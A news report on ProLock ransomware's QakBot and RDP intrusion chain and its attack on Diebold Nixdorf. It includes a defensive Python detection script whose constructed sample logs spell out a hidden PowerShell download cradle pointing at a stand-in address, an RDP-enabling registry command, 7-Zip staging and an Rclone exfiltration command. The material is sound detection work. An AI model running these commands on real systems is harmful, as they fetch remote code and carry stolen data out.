Diebold Nixdorf ATM attack by ProLock ransomware used QakBot trojan to access networks

News by Rene Millman

ProLock ransomware also exploits unprotected Remote Desktop Protocol (RDP) servers with weak credentials.

Security researchers have discovered that the ProLock ransomware has teamed up with the QakBot trojan to gain access to victims’ infrastructure.

In a blog post, Oleg Skulkin, senior digital forensics analyst at Group-IB, said ProLock first emerged in March this year as the successor of PwndLocker, the ransomware responsible for the attack on Illinois' Lasalle County. The new ransomware successfully attacked Diebold Nixdorf, one of the major ATM providers, at the end of April.

The ransomware's operators use two initial access vectors: the QakBot (Qbot) trojan and unprotected RDP servers with weak credentials.

Skulkin said that QakBot was the more interesting vector, as the trojan was at one point affiliated with the MegaCortex ransomware family. QakBot is distributed via phishing campaigns.

Once a victim downloads and opens a weaponised document and enables its malicious macros, PowerShell is launched and used to download and run the QakBot payload from the C2 server.

In the case of RDP access, valid accounts are used to gain persistence in the network. QakBot, on the other hand, uses multiple persistence mechanisms, most often Run keys and scheduled tasks, the researcher said.

QakBot also provides the ransomware operators with detection evasion capabilities, keylogging and credential dumping. ProLock's operators then use the stolen privileged credentials for network discovery, which includes, but is not limited to, port scanning and Active Directory reconnaissance.

“In addition to a wide variety of scripts, attackers use AdFind – another popular tool used by many ransomware groups – to query Active Directory,” said Skulkin.

ProLock's operators use RDP to move laterally across networks, and even keep batch scripts in their arsenal to enable RDP access on target hosts, according to the researchers. Data selected for exfiltration is archived with 7-Zip and uploaded with Rclone, a command-line tool capable of syncing files to and from different cloud storage providers.

It encrypts files, appending a .proLock, .pr0Lock or .proL0ck extension to each encrypted file, and leaves a ransom note demanding 35 Bitcoin, approximately US$312,000 (£283,000).
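The chain described above (macro-launched PowerShell download, Run-key and scheduled-task persistence, AdFind reconnaissance, RDP enabled by script, 7-Zip staging, Rclone exfiltration and the final rename burst) is what a defender would want to catch before the ransom note appears. The following Python is an added example written for this article, not Group-IB's code or a tool from their report. It runs a set of rules over a simplified, Sysmon-like event shape (process creation, registry set, file create) that is assumed for the example; the sample events, hostnames and the 203.0.113.5 address are constructed and not taken from any real incident.

```python
import re
from collections import Counter

# Extensions reported for ProLock in the article (compared case-insensitively).
ENCRYPTED_EXTS = (".prolock", ".pr0lock", ".prol0ck")
OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")
# Common PowerShell download-cradle markers; not an exhaustive list.
DOWNLOAD_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b|-enc", re.I)


def _base(path):
    """Lower-cased file name from a Windows path ('' for missing values)."""
    return path.rsplit("\\", 1)[-1].lower()


def analyse(events, burst_threshold=5):
    """Return findings as (rule, host, evidence) tuples for a list of events.

    Event shape assumed for this example (not a real product schema):
      {"type": "process", "host", "image", "parent", "cmd"}
      {"type": "registry", "host", "target"}
      {"type": "file", "host", "path"}
    """
    findings = []
    encrypted = Counter()  # per-host count of files with a ProLock extension
    for ev in events:
        host, kind = ev["host"], ev["type"]
        if kind == "process":
            image, parent, cmd = _base(ev["image"]), _base(ev.get("parent", "")), ev["cmd"]
            low = cmd.lower()
            parts = cmd.split()
            # Weaponised document: Office spawning PowerShell with a download cradle.
            if parent in OFFICE_APPS and image == "powershell.exe" and DOWNLOAD_CRADLE.search(cmd):
                findings.append(("macro_powershell_download", host, cmd))
            # Persistence via scheduled task creation.
            if image == "schtasks.exe" and "/create" in low:
                findings.append(("scheduled_task_persistence", host, cmd))
            # Active Directory reconnaissance with AdFind.
            if image == "adfind.exe":
                findings.append(("ad_recon_adfind", host, cmd))
            # Batch-script style enabling of RDP: fDenyTSConnections set to 0.
            if image == "reg.exe" and "fdenytsconnections" in low and re.search(r"/d\s+0\b", cmd):
                findings.append(("rdp_enabled_via_registry", host, cmd))
            # Staging: 7-Zip 'a' (add) command building an archive.
            if image in ("7z.exe", "7za.exe") and len(parts) > 1 and parts[1].lower() == "a":
                findings.append(("data_staging_7zip", host, cmd))
            # Exfiltration: Rclone pushing data to a cloud remote.
            if image == "rclone.exe" and re.search(r"\b(copy|sync|move)\b", cmd, re.I):
                findings.append(("cloud_exfil_rclone", host, cmd))
        elif kind == "registry":
            # Persistence via a Run key under HKLM or any user hive.
            if "\\currentversion\\run\\" in ev["target"].lower():
                findings.append(("run_key_persistence", host, ev["target"]))
        elif kind == "file":
            if ev["path"].lower().endswith(ENCRYPTED_EXTS):
                encrypted[host] += 1
    # Several renamed files on one host in the batch is an encryption burst.
    for host, n in encrypted.items():
        if n >= burst_threshold:
            findings.append(("ransomware_encryption_burst", host, f"{n} files with a ProLock extension"))
    return findings


# Constructed sample telemetry for this example; not real logs.
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS01",
     "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/p')"},
    {"type": "process", "host": "WS01", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell Get-Process"},  # benign, should not fire
    {"type": "registry", "host": "WS01",
     "target": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WinUpdate"},
    {"type": "process", "host": "WS01", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmd": "schtasks /create /tn Update /tr C:\\Users\\Public\\upd.exe /sc minute /mo 5"},
    {"type": "process", "host": "WS01", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Users\\Public\\AdFind.exe", "cmd": "AdFind.exe -f (objectcategory=person)"},
    {"type": "process", "host": "FS01", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\reg.exe",
     "cmd": "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"},
    {"type": "process", "host": "FS01", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Users\\Public\\7z.exe", "cmd": "7z.exe a -mx5 C:\\ProgramData\\st.7z C:\\Shares\\Finance"},
    {"type": "process", "host": "FS01", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Users\\Public\\rclone.exe", "cmd": "rclone.exe copy C:\\ProgramData\\st.7z remote:dump"},
    {"type": "file", "host": "FS01", "path": "C:\\Shares\\Finance\\budget.xlsx"},  # normal file
] + [{"type": "file", "host": "FS01", "path": f"C:\\Shares\\Finance\\report{i}.xlsx.proLock"} for i in range(5)]


if __name__ == "__main__":
    for rule, host, evidence in analyse(SAMPLE_EVENTS):
        print(f"{host:5} {rule:30} {evidence}")
```

The rules are deliberately narrow (exact image names, a specific registry value) so that each one maps to a step the article describes; in production the same structure would sit on top of a proper log pipeline and the rename burst would be counted over a time window rather than over a single batch.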

Skulkin said that the group behind the ransomware has its own unique approach.

“With more and more cybercrime groups showing interest in enterprise ransomware deployment campaigns, some operators may be involved in deploying different ransomware families, so we'll likely see more overlaps in tactics, techniques and procedures,” he said.

Tony Cole, CTO at Attivo, told SC Media UK that the best way to deal with a ransomware attack like this is to be well prepared in advance of the attack through implementing current best practices to reduce exposure to risk.

“If/when an attack takes place enact your incident response plan. If you don’t have one in place, it’s best to reach out and immediately contact a recognised professional incident response team to help you through the process. If you’re a small company and don’t have the resources, ask local law enforcement for assistance. Basic initial steps include isolation of infected systems and careful review of all connections that touch those systems,” he said.

Jamie Ahktar, co-founder and CEO at CyberSmart, told SC Media UK that the first and most important thing to do when an organisation has been hit by an attack is to disconnect the infected device from the network immediately (that means turning off GPS, Bluetooth, WiFi, etc) and removing external hardware like USB sticks and SD cards.

“Next, you should make everyone else in the company aware of the attack with advice on how to identify and avoid the attack themselves. The safest recovery method then is to wipe the device and restore its system and files using your backup data,” he said.
